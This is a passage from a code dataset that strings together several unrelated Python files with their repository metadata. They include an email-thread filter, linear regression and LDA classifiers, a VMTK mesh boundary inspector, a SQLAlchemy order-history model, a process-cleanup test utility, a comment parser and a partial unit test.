references_count += 1
else:
no_references_count += 1
document_count += 1
if 'message-id' in references.keys():
message_id_count += 1
if arg_reference in references.keys() and arg_in_or_out:
result[current] = message
elif arg_reference not in references.keys() and not arg_in_or_out:
result[current] = message
logging.info('documents : %d message-id: %d references: %d no references: %d' % (
document_count, message_id_count, references_count, no_references_count))
return result
def get_references(current_file):
result = {}
with open(current_file, 'rb') as fp:
message = pyzmail.message_from_file(fp)
if 'Message-Id' in message.keys():
result['message-id'] = message['Message-Id']
elif 'Message-ID' in message.keys():
result['message-id'] = message['Message-ID']
elif 'Message-id' in message.keys():
result['message-id'] = message['Message-id']
else:
logging.warn('no message id in file %s', current_file)
logging.info([key for key in message.keys()])
if 'References' in message.keys():
references = message['References'].split(' ')
result['references'] = references
if 'In-Reply-To' in message.keys():
result['in-reply-to'] = message['In-Reply-To']
return result, message
def run():
start_time = time.time()
with open('roots-settings.json') as data_file:
data = json.load(data_file)
logging.debug(data)
input_folder = data['input_folder']
document_count_limit = data['document_count_limit']
if document_count_limit == -1:
document_count_limit = sys.maxint
reference_of_interest = data['reference']
# our internal keys are always lowercase, so we want to be sure
# to use a lowercase reference for comparisons
reference_of_interest = reference_of_interest.lower()
in_or_out = data['reference_in']
in_or_out = bool(in_or_out)
pickle_file = data['output_pickle_file']
documents_of_interest = process_folder(input_folder, reference_of_interest, in_or_out, document_count_limit)
logging.info(
'found %d documents of interest: %s' % (len(documents_of_interest), sorted(documents_of_interest.keys())))
with open(pickle_file, 'wb') as output_fp:
pickle.dump(documents_of_interest, output_fp)
logging.info('wrote pickled dictionary to %s.' % pickle_file)
finish_time = time.time()
elapsed_hours, elapsed_remainder = divmod(finish_time - start_time, 3600)
elapsed_minutes, elapsed_seconds = divmod(elapsed_remainder, 60)
logging.info("Time: {:0>2}:{:0>2}:{:05.2f}".format(int(elapsed_hours), int(elapsed_minutes), elapsed_seconds))
if __name__ == '__main__':
run()
| 40.394231 | 160 | 0.650321 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 914 | 0.217567 |
906d400738f33dc206c78e71d946859aba32483a | 97 | py | Python | python/760.find-anagram-mappings.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
]
| null | null | null | python/760.find-anagram-mappings.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
]
| null | null | null | python/760.find-anagram-mappings.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
]
| null | null | null | class Solution:
def anagramMappings(self, A: List[int], B: List[int]) -> List[int]:
| 24.25 | 71 | 0.597938 | 87 | 0.896907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
906d8e08da166b6c85abfbc022b056f7f3eb7ea0 | 1,547 | py | Python | src/jdk.internal.vm.compiler/.mx.graal/mx_graal.py | siweilxy/openjdkstudy | 8597674ec1d6809faf55cbee1f45f4e9149d670d | [
"Apache-2.0"
]
| 2 | 2018-06-19T05:43:32.000Z | 2018-06-23T10:04:56.000Z | src/jdk.internal.vm.compiler/.mx.graal/mx_graal.py | siweilxy/openjdkstudy | 8597674ec1d6809faf55cbee1f45f4e9149d670d | [
"Apache-2.0"
]
| null | null | null | src/jdk.internal.vm.compiler/.mx.graal/mx_graal.py | siweilxy/openjdkstudy | 8597674ec1d6809faf55cbee1f45f4e9149d670d | [
"Apache-2.0"
]
| null | null | null | #
# ----------------------------------------------------------------------------------------------------
#
# Copyright (c) 2007, 2015, Oracle and/or its affiliates. All rights reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
#
# This code is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 only, as
# published by the Free Software Foundation.
#
# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# version 2 for more details (a copy is included in the LICENSE file that
# accompanied this code).
#
# You should have received a copy of the GNU General Public License version
# 2 along with this work; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
# or visit www.oracle.com if you need additional information or have any
# questions.
#
# ----------------------------------------------------------------------------------------------------
import mx
if mx.get_jdk(tag='default').javaCompliance < "1.9":
mx.abort('JAVA_HOME is not a JDK9: ' + mx.get_jdk(tag='default').home)
from mx_graal_9 import mx_post_parse_cmd_line, run_vm, get_vm, isJVMCIEnabled # pylint: disable=unused-import
import mx_graal_bench # pylint: disable=unused-import
| 45.5 | 109 | 0.66128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,329 | 0.859082 |
906df45a0cbaf0b269d84eb1b51d8ce436ca4a79 | 4,621 | py | Python | linear_regression.py | wail007/ml_playground | 5a8cd1fc57d3ba32a255e665fc3480f58eb9c3c2 | [
"Apache-2.0"
]
| null | null | null | linear_regression.py | wail007/ml_playground | 5a8cd1fc57d3ba32a255e665fc3480f58eb9c3c2 | [
"Apache-2.0"
]
| null | null | null | linear_regression.py | wail007/ml_playground | 5a8cd1fc57d3ba32a255e665fc3480f58eb9c3c2 | [
"Apache-2.0"
]
| null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import multivariate_normal
class _LinearModel(object):
def __init__(self):
self.w = None
def fit(self, x, y):
pass
def predict(self, x):
return np.dot(x, self.w)
def cost(self, x, y):
pass
def precision(self, x, y):
p = self.predict(x)
return (1.0 / len(p)) * np.sum(p == y)
class LeastSquareRegression(_LinearModel):
def __init__(self):
super(LeastSquareRegression, self).__init__()
def fit(self, x, y):
xt = x.transpose()
self.w = np.linalg.pinv(np.dot(xt, x)).dot(xt).dot(y)
def cost(self, x, y):
""" Residual Sum of Squares """
r = y - np.dot(x, self.w)
rt= np.transpose(r)
return (1.0 / len(x)) * np.trace(np.dot(rt, r))
class RidgeRegression(LeastSquareRegression):
def __init__(self, incr=0.1, min_change=0.001):
super(RidgeRegression, self).__init__()
self.incr = incr
self.min_change = min_change
def fit(self, x, y):
xtrain, xval = np.split(x, [int(0.7*len(x))])
ytrain, yval = np.split(y, [int(0.7*len(y))])
alpha = 0.0
best_alpha = 0.0
best_cost = float("inf")
old_cost = float("inf")
new_cost = float("inf")
while True:
self._fit(xtrain, ytrain, alpha)
new_cost = self.cost(xval, yval)
if new_cost < best_cost:
best_cost = new_cost
best_alpha = alpha
#print("cost: %f, alpha: %f" % (best_cost, best_alpha))
if abs(new_cost - old_cost) < self.min_change:
break
old_cost = new_cost
alpha += self.incr
self._fit(xtrain, ytrain, best_alpha)
def _fit(self, x, y, alpha):
x = x[:,1:]
xt = np.transpose(x)
self.w = np.linalg.pinv(np.dot(xt, x) + alpha * np.eye(x.shape[1])).dot(xt).dot(y)
bias = np.mean(y, axis=0, keepdims=True) - np.dot(np.mean(x, axis=0, keepdims=True), self.w)
self.w = np.vstack([bias, self.w])
class LeastSquareClassification(LeastSquareRegression):
def __init__(self):
super(LeastSquareClassification, self).__init__()
def predict(self, x):
return super(LeastSquareClassification, self).predict(x).argmax(axis=1)
class RidgeClassification(RidgeRegression):
def __init__(self, incr=0.1, min_change=0.001):
super(RidgeClassification, self).__init__(incr, min_change)
def predict(self, x):
return super(RidgeClassification, self).predict(x).argmax(axis=1)
class LDAClassification(_LinearModel):
def __init__(self):
self.w = None
self.priors = None
self.means = []
self.covs = []
def fit(self, x, y):
k = y.shape[1]
y_arg = np.argmax(y, axis=1)
class_count = np.sum (y, axis=0, keepdims=True)
self.priors = (1.0 / len(y)) * np.sum (y, axis=0, keepdims=True)
self.w = self._lda(x, y)
x_proj = np.dot(x, self.w)
means = (1.0 / class_count.T) * np.dot(y.T, x_proj)
for i in xrange(k):
xk_proj = x_proj[y_arg==i]
self.means.append(np.mean(xk_proj, axis = 0))
self.covs .append(np.cov (xk_proj, rowvar=False))
def predict(self, x):
k = self.w.shape[1]
x_proj = np.dot(x, self.w)
likelihood = np.column_stack([multivariate_normal.pdf(x_proj, self.means[i], self.covs[i]) for i in xrange(k)])
posterior = (likelihood * self.priors)
posterior = posterior / np.sum(posterior, axis=1, keepdims=True)
return np.argmax(posterior, axis=1)
def _lda(self, x, y):
k = y.shape[1]
y_arg = np.argmax(y, axis=1)
class_count= np.sum (y, axis=0, keepdims=True)
total_mean = np.mean(x, axis=0, keepdims=True)
class_mean = (1.0 / class_count.T) * np.dot(y.T, x)
mk_m = class_mean - total_mean
b_cov = np.dot(class_count * mk_m.T, mk_m)
w_cov = np.zeros(b_cov.shape)
for i in xrange(k):
xk = x[y_arg == i]
xk_mk = xk - class_mean[i]
w_cov += np.dot(xk_mk.T, xk_mk)
eig_vals, eig_vecs = np.linalg.eig(np.dot(np.linalg.pinv(w_cov), b_cov))
eig_vals = np.abs(eig_vals)
eig_args = np.argsort(eig_vals)[::-1][:k]
return eig_vecs[:, eig_args]
| 29.062893 | 119 | 0.554425 | 4,486 | 0.970786 | 0 | 0 | 0 | 0 | 0 | 0 | 101 | 0.021857 |
906e0d5d4effa98640d75d6a7be5cc83893d3c38 | 84 | py | Python | pygments_lexer_solidity/__init__.py | veox/pygments-lexer-solidity | e99ccf980337ceaad4fbc7ee11795e91d7fab0ae | [
"BSD-2-Clause"
]
| 2 | 2018-05-24T14:36:59.000Z | 2019-06-29T23:50:08.000Z | pygments_lexer_solidity/__init__.py | veox/pygments-lexer-solidity | e99ccf980337ceaad4fbc7ee11795e91d7fab0ae | [
"BSD-2-Clause"
]
| null | null | null | pygments_lexer_solidity/__init__.py | veox/pygments-lexer-solidity | e99ccf980337ceaad4fbc7ee11795e91d7fab0ae | [
"BSD-2-Clause"
]
| 1 | 2019-11-11T23:24:17.000Z | 2019-11-11T23:24:17.000Z | from .lexer import SolidityLexer, YulLexer
__all__ = ['SolidityLexer', 'YulLexer']
| 21 | 42 | 0.761905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.297619 |
906e5ccc6b995d3e3569837e29fff36deedc118c | 1,174 | py | Python | optimal_buy_gdax/history.py | coulterj/optimal-buy-gdax | cdebd2af2cf54bdef34c0ff64a4a731e540bdcdb | [
"Unlicense"
]
| null | null | null | optimal_buy_gdax/history.py | coulterj/optimal-buy-gdax | cdebd2af2cf54bdef34c0ff64a4a731e540bdcdb | [
"Unlicense"
]
| null | null | null | optimal_buy_gdax/history.py | coulterj/optimal-buy-gdax | cdebd2af2cf54bdef34c0ff64a4a731e540bdcdb | [
"Unlicense"
]
| null | null | null | #!/usr/bin/env python3
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Float, DateTime, Integer
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
class Order(Base):
__tablename__ = 'orders'
id = Column(Integer, primary_key=True)
currency = Column(String)
price = Column(Float)
size = Column(Float)
gdax_order_id = Column(String)
created_at = Column(DateTime)
class Withdrawal(Base):
__tablename__ = 'withdrawals'
id = Column(Integer, primary_key=True)
currency = Column(String)
amount = Column(Float)
crypto_address = Column(String)
gdax_withdrawal_id = Column(String)
class Deposit(Base):
__tablename__ = 'deposits'
id = Column(Integer, primary_key=True)
currency = Column(String)
amount = Column(Float)
payment_method_id = Column(String)
payout_at = Column(DateTime)
gdax_deposit_id = Column(String)
def get_session(engine):
engine = create_engine(engine)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
return session
| 24.458333 | 63 | 0.721465 | 736 | 0.626917 | 0 | 0 | 0 | 0 | 0 | 0 | 53 | 0.045145 |
906f41f56725ceef73c59638d0fd312fa10a88f9 | 6,689 | py | Python | vmtkScripts/vmtkmeshboundaryinspector.py | ramtingh/vmtk | 4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3 | [
"Apache-2.0"
]
| null | null | null | vmtkScripts/vmtkmeshboundaryinspector.py | ramtingh/vmtk | 4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3 | [
"Apache-2.0"
]
| null | null | null | vmtkScripts/vmtkmeshboundaryinspector.py | ramtingh/vmtk | 4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3 | [
"Apache-2.0"
]
| 1 | 2019-06-18T23:41:11.000Z | 2019-06-18T23:41:11.000Z | #!/usr/bin/env python
## Program: VMTK
## Module: $RCSfile: vmtkmeshboundaryinspector.py,v $
## Language: Python
## Date: $Date: 2006/05/26 12:35:13 $
## Version: $Revision: 1.3 $
## Copyright (c) Luca Antiga, David Steinman. All rights reserved.
## See LICENSE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
from __future__ import absolute_import #NEEDS TO STAY AS TOP LEVEL MODULE FOR Py2-3 COMPATIBILITY
import vtk
import sys
from vmtk import vtkvmtk
from vmtk import vmtkrenderer
from vmtk import pypes
class vmtkMeshBoundaryInspector(pypes.pypeScript):
def __init__(self):
pypes.pypeScript.__init__(self)
self.Mesh = None
self.CellEntityIdsArrayName = 'CellEntityIds'
self.VolumeCellEntityId = 0
self.WallCellEntityId = 1
self.vmtkRenderer = None
self.OwnRenderer = 0
self.ReferenceSystems = None
self.SetScriptName('vmtkmeshboundaryinspector')
self.SetScriptDoc('display a 3D render of the mesh with individual boundary groups colored and labeled')
self.SetInputMembers([
['Mesh','i','vtkUnstructuredGrid',1,'','the input mesh','vmtkmeshreader'],
['CellEntityIdsArrayName','entityidsarray','str',1,''],
['VolumeCellEntityId','volumeid','int',1],
['WallCellEntityId','wallid','int',1],
['vmtkRenderer','renderer','vmtkRenderer',1,'','external renderer']])
self.SetOutputMembers([
['ReferenceSystems','o','vtkPolyData',1,'','the output reference systems with boundary information','vmtksurfacewriter']
])
def Execute(self):
if not self.Mesh:
self.PrintError('Error: No input mesh.')
return
if not self.CellEntityIdsArrayName:
self.PrintError('Error: No input CellEntityIdsArrayName.')
return
if not self.vmtkRenderer:
self.vmtkRenderer = vmtkrenderer.vmtkRenderer()
self.vmtkRenderer.Initialize()
self.OwnRenderer = 1
self.vmtkRenderer.RegisterScript(self)
threshold = vtk.vtkThreshold()
threshold.SetInputData(self.Mesh)
threshold.ThresholdByUpper(self.VolumeCellEntityId+0.5)
threshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
threshold.Update()
boundaryMesh = threshold.GetOutput()
boundaryMesh.GetCellData().SetActiveScalars(self.CellEntityIdsArrayName)
boundaryMapper = vtk.vtkDataSetMapper()
boundaryMapper.SetInputData(boundaryMesh)
boundaryMapper.ScalarVisibilityOn()
boundaryMapper.SetScalarModeToUseCellData()
boundaryMapper.SetScalarRange(boundaryMesh.GetCellData().GetScalars().GetRange())
boundaryActor = vtk.vtkActor()
boundaryActor.SetMapper(boundaryMapper)
self.vmtkRenderer.Renderer.AddActor(boundaryActor)
wallThreshold = vtk.vtkThreshold()
wallThreshold.SetInputData(boundaryMesh)
wallThreshold.ThresholdByLower(self.WallCellEntityId+0.5)
wallThreshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
wallThreshold.Update()
wallMeshToSurface = vtk.vtkGeometryFilter()
wallMeshToSurface.SetInputConnection(wallThreshold.GetOutputPort())
wallMeshToSurface.Update()
boundaryReferenceSystems = vtkvmtk.vtkvmtkBoundaryReferenceSystems()
boundaryReferenceSystems.SetInputConnection(wallMeshToSurface.GetOutputPort())
boundaryReferenceSystems.SetBoundaryRadiusArrayName("BoundaryRadius")
boundaryReferenceSystems.SetBoundaryNormalsArrayName("BoundaryNormals")
boundaryReferenceSystems.SetPoint1ArrayName("Point1Array")
boundaryReferenceSystems.SetPoint2ArrayName("Point2Array")
boundaryReferenceSystems.Update()
self.ReferenceSystems = boundaryReferenceSystems.GetOutput()
cellEntityIdsArray = vtk.vtkIntArray()
cellEntityIdsArray.SetName(self.CellEntityIdsArrayName)
cellEntityIdsArray.SetNumberOfTuples(self.ReferenceSystems.GetNumberOfPoints())
self.ReferenceSystems.GetPointData().AddArray(cellEntityIdsArray)
boundaryThreshold = vtk.vtkThreshold()
boundaryThreshold.SetInputData(boundaryMesh)
boundaryThreshold.ThresholdByUpper(self.WallCellEntityId+0.5)
boundaryThreshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
boundaryThreshold.Update()
boundaryMeshToSurface = vtk.vtkGeometryFilter()
boundaryMeshToSurface.SetInputConnection(boundaryThreshold.GetOutputPort())
boundaryMeshToSurface.Update()
boundarySurface = boundaryMeshToSurface.GetOutput()
pointCells = vtk.vtkIdList()
surfaceCellEntityIdsArray = vtk.vtkIntArray()
surfaceCellEntityIdsArray.DeepCopy(boundarySurface.GetCellData().GetArray(self.CellEntityIdsArrayName))
self.PrintLog('')
for i in range(self.ReferenceSystems.GetNumberOfPoints()):
pointId = boundarySurface.FindPoint(self.ReferenceSystems.GetPoint(i))
boundarySurface.GetPointCells(pointId,pointCells)
cellId = pointCells.GetId(0)
cellEntityId = surfaceCellEntityIdsArray.GetValue(cellId)
cellEntityIdsArray.SetValue(i,cellEntityId)
origin = self.ReferenceSystems.GetPoint(i)
normal = self.ReferenceSystems.GetPointData().GetArray("BoundaryNormals").GetTuple3(i)
radius = self.ReferenceSystems.GetPointData().GetArray("BoundaryRadius").GetTuple1(i)
logLine = 'CellEntityId: %d\n' % cellEntityId
logLine += ' Origin: %f, %f, %f\n' % (origin[0],origin[1],origin[2])
logLine += ' Normal: %f, %f, %f\n' % (normal[0],normal[1],normal[2])
logLine += ' Radius: %f\n' % radius
self.PrintLog(logLine)
self.ReferenceSystems.GetPointData().SetActiveScalars(self.CellEntityIdsArrayName)
labelsMapper = vtk.vtkLabeledDataMapper();
labelsMapper.SetInputData(self.ReferenceSystems)
labelsMapper.SetLabelModeToLabelScalars()
labelsActor = vtk.vtkActor2D()
labelsActor.SetMapper(labelsMapper)
self.vmtkRenderer.Renderer.AddActor(labelsActor)
self.vmtkRenderer.Render()
if self.OwnRenderer:
self.vmtkRenderer.Deallocate()
if __name__=='__main__':
main = pypes.pypeMain()
main.Arguments = sys.argv
main.Execute()
| 39.579882 | 132 | 0.697264 | 5,861 | 0.876215 | 0 | 0 | 0 | 0 | 0 | 0 | 1,290 | 0.192854 |
906fc90146a02fc91c29a4ca6a8d89955a76d227 | 1,542 | py | Python | setup.py | sriz1/mudslide | 78aa8a1bda4080eacd777da7ff6bcbfd9afe129c | [
"MIT"
]
| 4 | 2020-09-05T00:17:27.000Z | 2022-01-25T19:44:32.000Z | setup.py | sriz1/mudslide | 78aa8a1bda4080eacd777da7ff6bcbfd9afe129c | [
"MIT"
]
| null | null | null | setup.py | sriz1/mudslide | 78aa8a1bda4080eacd777da7ff6bcbfd9afe129c | [
"MIT"
]
| 6 | 2020-11-20T15:42:03.000Z | 2022-02-10T02:43:29.000Z | from setuptools import setup
from distutils.util import convert_path
main_ns = {}
ver_path = convert_path('mudslide/version.py')
with open(ver_path) as ver_file:
exec(ver_file.read(), main_ns)
def readme():
with open("README.md") as f:
return f.read()
setup(
name='mudslide',
packages=['mudslide'],
version=main_ns['__version__'],
license='MIT',
description='Package to simulate nonadiabatic molecular dynamics using trajectory methods',
author='Shane M. Parker',
author_email='[email protected]',
url='https://github.com/smparker/mudslide',
download_url='https://github.com/smparker/mudslide/archive/v0.9.tar.gz',
keywords= ['science', 'chemistry', 'nonadiabatic dynamics'],
install_requires=[
'numpy>=1.19',
'scipy',
'typing_extensions'
],
test_suite='nose.collector',
tests_require=['nose'],
entry_points={
'console_scripts': [
'mudslide = mudslide.__main__:main',
'mudslide-surface = mudslide.surface:main'
]
},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Scientific/Engineering :: Physics',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8'
]
)
| 30.84 | 95 | 0.624514 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 833 | 0.540208 |
906fe64b74d7a1e64be5829e3ead36fd43b1f23d | 1,361 | py | Python | src/sklearn/sklearn_random_forest_test.py | monkeychen/python-tutorial | a24785da6b4d857200b819ad4d960885b1ef7a20 | [
"Apache-2.0"
]
| null | null | null | src/sklearn/sklearn_random_forest_test.py | monkeychen/python-tutorial | a24785da6b4d857200b819ad4d960885b1ef7a20 | [
"Apache-2.0"
]
| null | null | null | src/sklearn/sklearn_random_forest_test.py | monkeychen/python-tutorial | a24785da6b4d857200b819ad4d960885b1ef7a20 | [
"Apache-2.0"
]
| null | null | null | import csv
import joblib
from sklearn.metrics import accuracy_score
data = []
features = []
targets = []
feature_names = []
users = []
with open('satisfaction_feature_names.csv') as name_file:
column_name_file = csv.reader(name_file)
feature_names = next(column_name_file)[2:394]
with open('cza_satisfaction_train_0922.csv') as data_file:
csv_file = csv.reader(data_file)
idx = 0
for content in csv_file:
idx = idx + 1
if idx <= 10000:
continue
if idx > 50000:
break
content = content[:2] + list(map(float, content[2:]))
if len(content) != 0:
data.append(content)
features.append(content[2:394])
targets.append(content[-1])
users.append(content[1])
clf, sorted_feature_scores = joblib.load("cza_rf.pkl")
predict_result = clf.predict(features)
print(sorted_feature_scores)
print(accuracy_score(predict_result, targets))
result = list(zip(users, predict_result))
print(result[:10])
print(sum(predict_result))
print(sum([flag[1] for flag in result]))
with open("rf_predict_result.csv", "w", encoding="UTF-8") as w_file:
result_file = csv.writer(w_file)
for idx, row in enumerate(result):
if idx > 10:
break
row = list(row)
row.insert(0, 20200928)
result_file.writerow(row)
| 27.22 | 68 | 0.648788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 110 | 0.080823 |
9070d5bf65f2cf491385a39c1e6e52e356fd0952 | 573 | py | Python | py/test.py | BEARUBC/grasp-kernel | ea2c9b698a2c457e798eff909941dc6e7c852bb2 | [
"Apache-2.0"
]
| 1 | 2021-05-31T22:05:10.000Z | 2021-05-31T22:05:10.000Z | py/test.py | BEARUBC/grasp-kernel-wrapper | ea2c9b698a2c457e798eff909941dc6e7c852bb2 | [
"Apache-2.0"
]
| null | null | null | py/test.py | BEARUBC/grasp-kernel-wrapper | ea2c9b698a2c457e798eff909941dc6e7c852bb2 | [
"Apache-2.0"
]
| 1 | 2021-05-31T18:54:55.000Z | 2021-05-31T18:54:55.000Z | class TestClass:
def __init__(self, list, name):
self.list = list
self.name = name
def func1():
print("func1 print something")
def func2():
print("func2 print something")
integer = 8
return integer
def func3():
print("func3 print something")
s = "func3"
return s
def func4():
print("func4 print something")
listIntegers = [1,2,3,4,5]
return listIntegers
def func5():
print("func5 print something")
listStrings = ["a","b","c","d","e"]
return listStrings
print("Hello World")
# test = TestClass()
| 18.483871 | 39 | 0.612565 | 102 | 0.17801 | 0 | 0 | 0 | 0 | 0 | 0 | 170 | 0.296684 |
9070ee6ae571936274c18044e8321cc9866dd425 | 2,836 | py | Python | tests/utils/_process_nonwin.py | chrahunt/quicken | 2dd00a5f024d7b114b211aad8a2618ec8f101956 | [
"MIT"
]
| 3 | 2019-11-12T17:56:08.000Z | 2022-03-12T03:43:10.000Z | tests/utils/_process_nonwin.py | chrahunt/quicken | 2dd00a5f024d7b114b211aad8a2618ec8f101956 | [
"MIT"
]
| 47 | 2018-12-10T04:08:58.000Z | 2022-03-20T14:54:36.000Z | tests/utils/_process_nonwin.py | chrahunt/quicken | 2dd00a5f024d7b114b211aad8a2618ec8f101956 | [
"MIT"
]
| 1 | 2019-11-12T17:55:17.000Z | 2019-11-12T17:55:17.000Z | """Utilities for managing child processes within a scope - this ensures
tests run cleanly even on failure and also gives us a mechanism to
get debug info for our children.
"""
import logging
import os
import sys
from contextlib import contextmanager
from typing import ContextManager, List
import psutil
import process_tracker
process_tracker.install()
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
__all__ = [
"active_children",
"contained_children",
"disable_child_tracking",
"kill_children",
]
def _get_create_time(create_time):
"""Given basic process create time, return one that would
match psutil.
"""
boot_time = psutil.boot_time()
clock_ticks = os.sysconf("SC_CLK_TCK")
return boot_time + (create_time / clock_ticks)
def active_children() -> List[psutil.Process]:
"""Returns the active child processes.
"""
out = []
children = process_tracker.children()
for pid, create_time in children:
try:
process = psutil.Process(pid)
except psutil.NoSuchProcess:
continue
else:
if process.create_time() == _get_create_time(create_time):
out.append(process)
return out
@contextmanager
def contained_children(timeout=1, assert_graceful=True) -> ContextManager:
"""Automatically kill any Python processes forked in this context, for
cleanup. Handles any descendants.
Timeout is seconds to wait for graceful termination before killing children.
"""
try:
# TODO: What to yield here?
yield
finally:
alive = kill_children(timeout)
num_alive = len(alive)
# Get current exception - if something was raised we should be raising
# that.
# XXX: Need to check use cases to see if there are any cases where
# we are expecting an exception outside of the 'contained_children'
# block.
_, exc, _ = sys.exc_info()
if assert_graceful and exc is None:
assert not num_alive, f"Unexpected children still alive: {alive}"
def disable_child_tracking():
# TODO: Actually needed?
pids = [p.pid for p in active_children()]
return pids
def kill_children(timeout=1) -> List[psutil.Process]:
"""
Kill any active children, returning any that were not terminated within
timeout.
Args:
timeout: time to wait before killing.
Returns:
list of processes that had to be killed forcefully.
"""
procs = active_children()
for p in procs:
try:
p.terminate()
except psutil.NoSuchProcess:
pass
gone, alive = psutil.wait_procs(procs, timeout=timeout)
for p in alive:
logger.warning("Cleaning up child: %d", p.pid)
p.kill()
return alive
| 26.504673 | 80 | 0.665374 | 0 | 0 | 841 | 0.296544 | 857 | 0.302186 | 0 | 0 | 1,157 | 0.407969 |
9071096add8b5a4db338073c96e92750aa128c1f | 2,516 | py | Python | data/meneame/parse_meneame.py | segurac/DeepQA | b7f95e6e14ba9469f17a2a43df87f2a69e431eeb | [
"Apache-2.0"
]
| null | null | null | data/meneame/parse_meneame.py | segurac/DeepQA | b7f95e6e14ba9469f17a2a43df87f2a69e431eeb | [
"Apache-2.0"
]
| null | null | null | data/meneame/parse_meneame.py | segurac/DeepQA | b7f95e6e14ba9469f17a2a43df87f2a69e431eeb | [
"Apache-2.0"
]
| null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2016 Carlos Segura. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import os
import sys
import gzip
parents = {}
conversations = []
samples = {}
class Sample:
comentario_id = None
parent_id = []
commentario = ''
comentario_id = None
parent_id = []
with gzip.open(sys.argv[1]) as f:
for line in f:
try:
line = line.decode('utf-8').strip()
#print(line)
splitted_line = line.split()
if len(splitted_line) == 0:
continue
head = splitted_line[0]
rest = splitted_line[1:]
if head == 'comentario_id:':
comentario_id = rest[0]
parent_id = []
if head == 'parent_id:':
parent_id.append(rest[0])
if head == 'comentario:':
comentario = rest
if len(comentario) == 0:
comentario_id = None
parent_id = []
continue
#Store this comment in parents dictionary
if comentario_id is not None:
sample = Sample()
sample.comentario_id = comentario_id
sample.parent_id = parent_id
sample.comentario = comentario
samples[comentario_id] = sample
comentario_id = None
parent_id = []
except:
continue
for k in samples:
sample = samples[k]
for parent in sample.parent_id:
if parent in samples:
qa = [samples[parent].comentario, sample.comentario]
conversations.append(qa)
for conversation in conversations:
print('********************************************')
for frase in conversation:
print(*frase)
| 27.955556 | 79 | 0.534181 | 72 | 0.028617 | 0 | 0 | 0 | 0 | 0 | 0 | 860 | 0.341812 |
90740254e2ea619dbf9f847e862986ac065aaf0a | 4,087 | py | Python | dfstools/tests/test_relationship_tools.py | orekunrin/comp410_summer2020 | ab69d578a981ad0262f76baeccb5d16e8d2e182a | [
"Apache-2.0"
]
| null | null | null | dfstools/tests/test_relationship_tools.py | orekunrin/comp410_summer2020 | ab69d578a981ad0262f76baeccb5d16e8d2e182a | [
"Apache-2.0"
]
| null | null | null | dfstools/tests/test_relationship_tools.py | orekunrin/comp410_summer2020 | ab69d578a981ad0262f76baeccb5d16e8d2e182a | [
"Apache-2.0"
]
| null | null | null | import unittest
import pandas as pd
import git
import os
from dfstools import get_dataset_dtypes
from dfstools import find_related_cols_by_name
from dfstools import find_related_cols_by_content
from dfstools import find_parent_child_relationships
from dfstools import pecan_cookies_load_data
class RelationshipTools(unittest.TestCase):
def test_get_dataset_dtypes(self):
expected = {'airlines': {'carrier': {'dtype': 'O'}},
'airports': {'dest': {'dtype': 'O'}},
'flights': {'dest': {'dtype': 'O'}, 'carrier': {'dtype': 'O'},'flight_id': {'dtype': 'O'}},
'trip_logs': {'flight_id': {'dtype': 'O'}}}
result = get_dataset_dtypes(None)
self.assertEqual(expected, result)
expected = {
'airlines': {'carrier': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'flights.carrier': {}}]}},
'airports': {'dest': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'flights.dest': {}}]}},
'flights': {'dest': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'airports.dest': {}}]},
'carrier': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'airlines.carrier': {}}]},
'flight_id': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'trip_logs.flight_id': {}}]}},
'trip_logs': {'flight_id': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'flights.flight_id': {}}]}}}
